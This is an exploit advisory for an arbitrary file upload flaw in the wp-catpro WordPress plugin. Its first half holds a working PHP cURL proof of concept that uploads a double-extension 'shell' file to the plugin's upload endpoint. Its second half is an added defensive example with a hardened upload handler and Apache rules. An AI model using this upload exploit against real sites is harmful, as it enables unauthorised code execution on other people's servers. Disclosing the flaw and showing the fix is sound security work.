
WordPress plugin wp-catpro arbitrary file upload

Posted on 2013-2-27 20:12:43
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

Author => Zikou-16
Email => zikou16x@gmail.com
Tested on: Windows 7, Backtrack 5r3
Download: http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit info:
------------------
# An attacker can upload file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
<?php
// Upload a file whose last extension passes the allowed list ("gif") but that
// Apache still hands to the PHP handler because of the inner ".php".
$uploadfile = "zik.php.gif";

$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
// PHP >= 5.5 uses CURLFile for multipart uploads; the original "@file" syntax
// is kept for the PHP 5.3/5.4 the advisory was written against.
$filedata = class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile";
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata' => $filedata,
          'folder'   => '/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

// The response contains the name the handler stored the file under.
print "$postResult";

// Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
?>

// Contents of zik.php.gif (the uploaded "shell"):
<?php
phpinfo();
?>
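The advisory quotes the handler's two controls: an allowed-extension list of jpg/gif/png and a filename character class that permits '.', so a name such as shell.php.gif passes the extension check and, on an Apache host where AddHandler maps .php, is still executed as PHP because every extension in the name is consulted. The block below is an added illustration, not the wp-catpro plugin's code and not part of Zikou-16's advisory: a hypothetical handler with the weak last-extension check next to a hardened version that decides the type from the file bytes, ignores the client-supplied name and any client "folder" field, and stores under a random single-extension name. The function names and the sample uploads are constructed for the example.

```php
<?php
// Added illustration, not the wp-catpro plugin's code: a hypothetical upload
// handler with the weak "last extension only" check the advisory describes,
// next to a hardened version. Run with: php upload_check.php
declare(strict_types=1);

const ALLOWED_EXT = ['jpg', 'gif', 'png'];

// Weak check: compares only the final extension, so "shell.php.gif" passes.
// With Apache's "AddHandler application/x-httpd-php .php" every extension of
// the name is consulted and the file is still executed as PHP.
function weakAccepts(string $clientName): bool
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return in_array($ext, ALLOWED_EXT, true);
}

// Hardened check. The client-supplied name is never reused and a client
// "folder" field is never honoured: the caller joins the returned name with
// one fixed server-side directory. Returns the storage name or null.
function hardenedName(string $tmpPath): ?string
{
    // Decide the type from the bytes, not from the name.
    $info = @getimagesize($tmpPath);
    if ($info === false) {
        return null;
    }
    $byType = [IMAGETYPE_JPEG => 'jpg', IMAGETYPE_GIF => 'gif', IMAGETYPE_PNG => 'png'];
    if (!isset($byType[$info[2]])) {
        return null;
    }
    // Random name, exactly one dot, extension chosen by the server. A GIF
    // header followed by PHP still passes getimagesize() (see the demo), so
    // this rename plus a no-PHP rule on the upload directory is what actually
    // stops execution, not the content sniff on its own.
    return bin2hex(random_bytes(16)) . '.' . $byType[$info[2]];
}

// Constructed sample uploads (not from the advisory): a valid 1x1 GIF, the
// advisory's shell payload, and a GIF/PHP polyglot.
function demo(): void
{
    $samples = [
        'photo.gif'     => "GIF89a" . pack('vv', 1, 1) . "\x00\x00\x00;",
        'shell.php.gif' => "<?php phpinfo(); ?>",
        'poly.php.gif'  => "GIF89a<?php phpinfo(); ?>",
    ];
    foreach ($samples as $name => $bytes) {
        $tmp = tempnam(sys_get_temp_dir(), 'up');
        file_put_contents($tmp, $bytes);
        printf("%-14s weak=%-3s hardened=%s\n",
            $name,
            weakAccepts($name) ? 'ok' : 'no',
            hardenedName($tmp) ?? 'rejected');
        unlink($tmp);
    }
}

demo();
```

All three constructed names pass the weak check. The hardened path rejects the bare PHP payload because it is not an image, but it accepts the GIF/PHP polyglot, which is the point of the comment in hardenedName(): the server-chosen random name with a single .gif extension is what keeps that file from ever reaching the PHP handler. Pair it with an Apache rule in the upload directory that refuses PHP execution, for example `php_flag engine off` under mod_php, or a `<FilesMatch "\.ph(p[0-9]?|tml)$">` block with `Require all denied`.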